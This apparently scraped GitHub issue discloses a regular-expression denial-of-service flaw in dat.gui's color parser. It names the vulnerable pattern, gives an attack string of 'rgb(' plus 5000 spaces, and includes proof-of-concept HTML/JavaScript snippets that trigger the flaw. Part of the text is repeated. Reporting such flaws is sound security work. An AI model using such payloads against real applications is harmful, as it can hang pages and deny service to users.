Closed yetingli closed 3 years ago
Type of Issue Potential Regex Denial of Service (ReDoS)
Description The vulnerable regular expression is located in
https://github.com/dataarts/dat.gui/blob/51d1a37b00326c232f34d9b80dc6dea2bec8595b/src/dat/color/interpret.js#L61
https://github.com/dataarts/dat.gui/blob/51d1a37b00326c232f34d9b80dc6dea2bec8595b/src/dat/color/interpret.js#L79
The ReDOS vulnerability of the regex is mainly due to the sub-pattern \s*(.+)\s* and can be exploited with the following string "rgb("+" " * 5000
\s*(.+)\s*
"rgb("+" " * 5000
You can execute the following code to reproduce ReDos
<script type="text/javascript" src="build/dat.gui.js"></script> <script type="text/javascript"> var gui = new dat.gui.GUI(); var Options = function() { this.color0 = "rgb( "; // CSS string }; window.onload = function() { var options = new Options(); gui.addColor(options, 'color0'); }; </script>
<script type="text/javascript" src="build/dat.gui.js"></script> <script type="text/javascript"> var gui = new dat.gui.GUI(); var Options = function() { this.color0 = "rgba( "; // CSS string }; window.onload = function() { var options = new Options(); gui.addColor(options, 'color0'); }; </script>
Type of Issue Potential Regex Denial of Service (ReDoS)
Description The vulnerable regular expression is located in
https://github.com/dataarts/dat.gui/blob/51d1a37b00326c232f34d9b80dc6dea2bec8595b/src/dat/color/interpret.js#L61
https://github.com/dataarts/dat.gui/blob/51d1a37b00326c232f34d9b80dc6dea2bec8595b/src/dat/color/interpret.js#L79
The ReDOS vulnerability of the regex is mainly due to the sub-pattern
\s*(.+)\s*and can be exploited with the following string"rgb("+" " * 5000You can execute the following code to reproduce ReDos